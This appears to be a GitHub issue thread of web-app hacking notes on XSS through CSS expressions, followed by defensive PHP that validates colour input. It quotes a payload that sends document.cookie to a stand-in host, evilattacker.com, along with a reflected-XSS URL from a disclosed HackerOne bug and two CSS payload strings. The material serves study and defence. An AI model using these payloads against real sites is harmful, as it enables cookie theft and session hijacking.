Web-App-Hacking-Notes

Create notes about XSS via CSS expressions

Open tcpiplab opened this issue 7 years ago • 3 comments

From @padraic's book which is at his phpsecurity repository:

On the server:

```php
<div style="background:<?php echo $colour ?>;">
```

Injection payload:

```php
<?php
// Attacker-controlled value that ends up in the style attribute
$colour = "expression(document.write('<iframe src="
    . "http://evilattacker.com?cookie=' + document.cookie.escape() + "
    . "' height=0 width=0 />'))";
?>
<div style="background:<?php echo $colour ?>;">
```

tcpiplab, Apr 07 '17 23:04

Sitepoint has a good page documenting CSS expressions.

tcpiplab, Apr 07 '17 23:04

I first heard of CSS expressions as an XSS payload from a publicly disclosed bug on hackerone.com:

Reflected cross-site scripting (XSS) vulnerability in scores.ubnt.com allows attackers to inject arbitrary web script via p parameter.

Attack:

https://scores.ubnt.com/form.html?uid=259&p=airFiber);xss:expression(alert(1));border-image:url(foobar

Two options for the payload:

```
);xss:expression(alert(1));border-image:url(foobar
);border-image: url(javascript:alert(1));content:url(foobar
```

tcpiplab, Apr 08 '17 00:04

This attack targets older IE browsers. But it supposedly works with Chrome, which I will test.

tcpiplab, Apr 08 '17 00:04
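A defensive counterpart to the server-side snippet in the first post, added here as an example and not taken from the thread or from the book: the value is checked against an allow-list of colour forms before it is echoed into the `style` attribute, so the payload shapes quoted above fall back to a default. The function name `safe_css_colour()` and the keyword list are assumptions made for illustration.

```php
<?php
// Added example: allow-list validation for a value echoed into a CSS property.
// safe_css_colour() and the $named list are hypothetical, not from the book.

function safe_css_colour(string $input, string $default = 'transparent'): string
{
    // Constructed allow-list of colour keywords; extend to suit the application.
    static $named = ['black', 'white', 'red', 'green', 'blue', 'transparent'];

    $value = strtolower(trim($input));

    // #rgb or #rrggbb only: no parentheses, colons, semicolons, url() or expression().
    if (preg_match('/\A#(?:[0-9a-f]{3}|[0-9a-f]{6})\z/', $value) === 1) {
        return $value;
    }
    if (in_array($value, $named, true)) {
        return $value;
    }
    // Anything else is discarded rather than repaired.
    return $default;
}

// Constructed sample inputs, including the payload shapes quoted in this thread.
$samples = [
    '#FFcc00',
    'blue',
    "expression(document.write('...'))",
    ');xss:expression(alert(1));border-image:url(foobar',
    ');border-image: url(javascript:alert(1));content:url(foobar',
];

foreach ($samples as $colour) {
    $safe = safe_css_colour($colour);
    // htmlspecialchars() is still applied because the value sits inside an HTML attribute.
    printf(
        "<div style=\"background:%s;\">  <!-- input: %s -->\n",
        htmlspecialchars($safe, ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($colour, ENT_QUOTES, 'UTF-8')
    );
}
```

HTML escaping alone does not help in this context, because none of the quoted payloads needs a quote or angle bracket to stay inside the `style` value; the check has to be on what is valid CSS for that property.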